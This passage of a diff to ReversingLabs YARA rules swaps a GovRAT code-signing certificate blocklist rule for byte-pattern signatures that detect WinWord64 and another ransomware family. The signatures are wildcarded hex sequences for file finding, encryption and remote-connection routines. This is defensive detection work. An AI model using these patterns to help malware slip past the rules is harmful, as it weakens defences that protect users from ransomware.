72 ?? ?? ?? ?? 16 28 ?? ?? ?? + ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 2B ?? 00 16 28 ?? ?? ?? ?? 72 ?? + ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 72 ?? ?? ?? + ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 + 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 16 28 + ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 72 ?? ?? + ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 + ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 28 ?? ?? ?? ?? 02 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? + ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? + ?? ?? ?? 28 ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? + ?? 6F ?? ?? ?? ?? 00 06 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 16 28 ?? ?? ?? ?? + 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 28 ?? ?? + ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 + ?? 11 ?? 2C ?? 00 02 17 7D ?? ?? ?? ?? 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? + ?? 25 17 6F ?? ?? ?? ?? 00 6F ?? ?? ?? ?? 00 06 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 02 + 7B ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? + ?? ?? 00 00 2A + } + $find_files = { + 73 ?? ?? ?? ?? 0A 06 02 7D ?? ?? ?? ?? 06 04 7D ?? ?? ?? ?? 06 05 7D ?? ?? ?? ?? 00 00 + 03 28 ?? ?? ?? ?? 0B 00 07 0C 16 0D 2B ?? 08 09 9A 13 ?? 00 02 11 ?? 06 7B ?? ?? ?? ?? + 28 ?? ?? ?? ?? 00 00 09 17 58 0D 09 08 8E 69 32 ?? 06 7B ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? + 00 00 00 03 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 06 7D ?? ?? + ?? ?? 11 ?? 11 ?? 11 ?? 9A 7D ?? ?? ?? ?? 00 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 + ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 00 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? + 8E 69 32 ?? 00 DE ?? 13 ?? 00 72 ?? ?? ?? ?? 03 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE + ?? 00 00 DE ?? 26 00 72 ?? ?? ?? ?? 03 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? 2A + } + $encrypt_files = { + 00 28 ?? ?? ?? ?? 0A 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 73 ?? ?? ?? ?? 0B 28 ?? ?? ?? + ?? 04 6F ?? ?? ?? ?? 0C 73 ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ?? + ?? ?? ?? 6F ?? ?? ?? ?? 00 09 18 6F ?? ?? ?? ?? 00 08 06 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? + 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F + ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 1A 6F ?? ?? ?? ?? 00 07 06 16 06 + 8E 69 6F ?? ?? ?? ?? 00 07 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 03 19 73 ?? ?? ?? + ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 00 2B ?? 00 28 ?? ?? ?? ?? 00 11 ?? 11 ?? + 16 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 25 13 ?? 16 FE + 02 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 13 ?? 00 72 ?? ?? ?? ?? 11 ?? 6F + ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? DE ?? 00 11 ?? 6F ?? ?? ?? ?? 00 + 07 6F ?? ?? ?? ?? 00 00 DC 2A + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "HON HAI PRECISION INDUSTRY CO. LTD." and pe.signatures[i].serial=="25:65:41:e2:04:61:90:33:f8:b0:9f:9e:b7:c8:8e:f8" and 1424303999<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($setup_env_p*)) and ($find_files) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_00E8Cc18Cf100B6B27443Ef26319398734 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Winword64 : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing GovRAT malware." + description = "Yara rule that detects WinWord64 ransomware." author = "ReversingLabs" - id = "f7e80c51-9dcf-599a-8164-c07cf4c9c5ff" - date = "2023-11-08" - modified = "2023-11-08" + id = "a5f7967d-58f4-5fdd-b67f-5f5dbfec0f4b" + date = "2021-02-11" + modified = "2021-02-11" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1434-L1452" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "68e9df056109cae41d981090c7a98ddc192a445647d7475569ddbe4118e570c5" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.WinWord64.yara#L1-L215" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "73d8c4f1b3bed365320b26332f1f1b49404d8e6536f3e25042f5f64e5bc09bd4" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "WinWord64" + tc_detection_factor = 5 importance = 25 + strings: + $remote_connection_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? A1 ?? ?? ?? + ?? 33 DB 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ?? + 03 C1 89 9D ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ?? 51 + 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 53 89 5D ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ?? + ?? ?? ?? 53 0F 43 85 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? + 85 DB 0F 84 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F 43 0D + ?? ?? ?? ?? 03 C1 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ?? 51 50 51 + 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ?? 0F 43 45 ?? 68 ?? ?? ?? ?? 50 53 + FF 15 ?? ?? ?? ?? 8B 55 ?? 8B D8 89 9D ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 + ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? + 76 ?? FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? 66 89 45 ?? 85 DB 0F 84 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? B9 ?? ?? + ?? ?? A1 ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ?? 03 C1 83 3D ?? ?? ?? ?? ?? B9 + } + $remote_connection_p2 = { + 0F 43 0D ?? ?? ?? ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D BD ?? + ?? ?? ?? 83 BD ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F 43 BD ?? ?? ?? ?? 83 + 3D ?? ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ?? 03 C1 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F + 43 0D ?? ?? ?? ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 85 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 57 53 FF 15 ?? ?? ?? + ?? 8B 55 ?? 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? + 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 + E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 88 45 ?? 8B 95 ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? + ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 ?? + FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? + C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? + ?? ?? C6 45 ?? ?? 8D 4D ?? 83 7D ?? ?? 8B 45 ?? 0F 43 4D ?? 03 C1 83 7D ?? ?? 8D 4D + ?? 0F 43 4D ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? + ?? 83 BD ?? ?? ?? ?? ?? 8D 4D ?? 68 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 89 85 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? B9 ?? ?? + ?? ?? 83 3D ?? ?? ?? ?? ?? 8B 75 ?? 8B C6 0F 43 0D ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B + } + $remote_connection_p3 = { + 55 ?? 2B C2 57 51 3B F8 77 ?? 8D 04 3A 83 FE ?? 89 45 ?? 8D 45 ?? 0F 43 45 ?? 8D 34 + 10 56 E8 ?? ?? ?? ?? 83 C4 ?? C6 04 37 ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 + ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 75 ?? 8B C6 + 8B BD ?? ?? ?? ?? 0F 43 CF 8B 55 ?? 2B C2 8B 9D ?? ?? ?? ?? 53 51 3B D8 77 ?? 8D 04 + 1A 83 FE ?? 89 45 ?? 8D 45 ?? 0F 43 45 ?? 8D 34 10 56 E8 ?? ?? ?? ?? 83 C4 ?? C6 04 + 1E ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B BD + ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? B9 ?? ?? ?? ?? 83 3D ?? ?? + ?? ?? ?? 8B 75 ?? 8B C6 0F 43 0D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 55 ?? 2B C2 53 51 + 3B D8 77 ?? 8D 04 1A 83 FE ?? 89 45 ?? 8D 45 ?? 0F 43 45 ?? 8D 34 10 56 E8 ?? ?? ?? + ?? 83 C4 ?? C6 04 33 ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 53 E8 + ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B 45 ?? 0F 43 + D3 8B 75 ?? 2B C6 8B 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04 0E 89 45 ?? + 8D 45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 04 06 ?? + EB ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8B 9D ?? ?? + ?? ?? 83 3D ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 8B + } + $remote_connection_p4 = { + 45 ?? 8B 75 ?? 2B C6 89 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04 0E 89 45 + ?? 8D 45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 04 30 + ?? EB ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8B 95 ?? + ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B D0 83 78 ?? ?? 72 ?? 8B 10 + 8B 48 ?? 8B 45 ?? 8B 75 ?? 2B C6 89 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D + 04 0E 89 45 ?? 8D 45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 + ?? C6 04 30 ?? EB ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? + ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? + ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 ?? FF 15 ?? ?? ?? ?? 52 + 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? BA ?? ?? ?? ?? 83 3D + ?? ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 8B 45 ?? 8B 75 ?? 2B C6 89 8D + ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04 0E 89 45 ?? 8D 45 ?? 0F 43 45 ?? 03 + F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 04 30 ?? EB ?? C6 85 ?? ?? ?? ?? + ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 55 ?? 8B 4D ?? 0F 43 + 55 ?? 8B 45 ?? 8B 75 ?? 2B C6 89 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04 + 0E 89 45 ?? 8D 45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? + C6 04 30 ?? EB ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? + 83 3D ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 8B 45 ?? + 8B 75 ?? 2B C6 89 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04 31 89 45 ?? 8D + } + $remote_connection_p5 = { + 45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 04 30 ?? EB + ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? + ?? 85 F6 74 ?? 8B 45 ?? 8D 4D ?? 83 7D ?? ?? 6A ?? 0F 43 4D ?? 50 50 51 6A ?? FF B5 + ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? + ?? ?? ?? 51 68 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 F6 8B 35 ?? + ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 50 FF D6 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 50 FF D6 8B + 85 ?? ?? ?? ?? 85 C0 74 ?? 50 FF D6 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA + ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 + E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? + C6 45 ?? ?? 83 F8 ?? 72 ?? 8D 48 ?? 8B C3 81 F9 ?? ?? ?? ?? 72 ?? 8B 5B ?? 83 C1 ?? + 2B C3 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 51 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? + ?? ?? 83 F8 ?? 72 ?? 8D 48 ?? 8B C7 81 F9 ?? ?? ?? ?? 72 ?? 8B 7F ?? 83 C1 ?? 2B C7 + } + $remote_connection_p6 = { + 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 51 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? + 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 + F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 + ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? + 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? + ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 4D ?? + 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 + 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? + ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 ?? FF 15 ?? ?? ?? ?? 52 + 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD + E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $encrypt_files_p1 = { + FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 55 ?? 8B 4D ?? 0F 43 55 ?? 03 CA 89 85 ?? ?? ?? ?? + 83 7D ?? ?? 8D 45 ?? 51 0F 43 45 ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 + 7F ?? ?? 72 ?? 8B 3F 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? + ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 + ?? FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? 83 7D ?? ?? 8D 4D ?? 66 89 85 ?? ?? ?? ?? 0F 43 4D ?? 8B 45 ?? 03 C1 C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 0F 43 4D ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8B F0 83 7E ?? ?? 72 ?? 8B 36 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? + ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 + C0 ?? 83 F8 ?? 76 ?? FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 50 6A ?? 68 ?? ?? ?? ?? 57 8B 3D ?? ?? + ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? FF D7 89 85 ?? ?? ?? ?? 83 + F8 ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 FF + D7 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C9 BA + } + $encrypt_files_p2 = { + 8D 40 ?? F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? BA ?? ?? + ?? ?? 8B 0D ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 03 CA 89 85 ?? ?? ?? ?? 83 3D ?? ?? ?? + ?? ?? B8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 0F 43 05 ?? ?? ?? ?? 51 50 8B CE E8 ?? ?? ?? + ?? A1 ?? ?? ?? ?? 83 C4 ?? 33 C9 68 ?? ?? ?? ?? 6A ?? 56 66 89 0C 46 8D 85 ?? ?? ?? + ?? 51 50 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? FF B5 ?? + ?? ?? ?? FF 15 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 + 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? + ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 + C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 0F 82 ?? ?? ?? ?? 8B 4D ?? 42 + 8B C1 81 FA ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? + 0F 86 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? + FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? + 8D 45 ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? E9 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? + ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? + 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 FF 33 F6 57 FF B5 ?? ?? + ?? ?? FF 15 ?? ?? ?? ?? 57 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 + } + $encrypt_files_p3 = { + 8B 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 03 F8 8D 85 ?? ?? ?? ?? 3B + BD ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 0F 44 F1 50 6A ?? 56 6A ?? FF B5 ?? ?? ?? ?? FF + 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 + FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 + ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? + ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? + B9 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF + B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? + ?? 8B 35 ?? ?? ?? ?? FF D6 FF B5 ?? ?? ?? ?? FF D6 C6 85 ?? ?? ?? ?? ?? E9 ?? ?? ?? + ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8A 85 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 + 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $find_files = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? + 33 C5 89 45 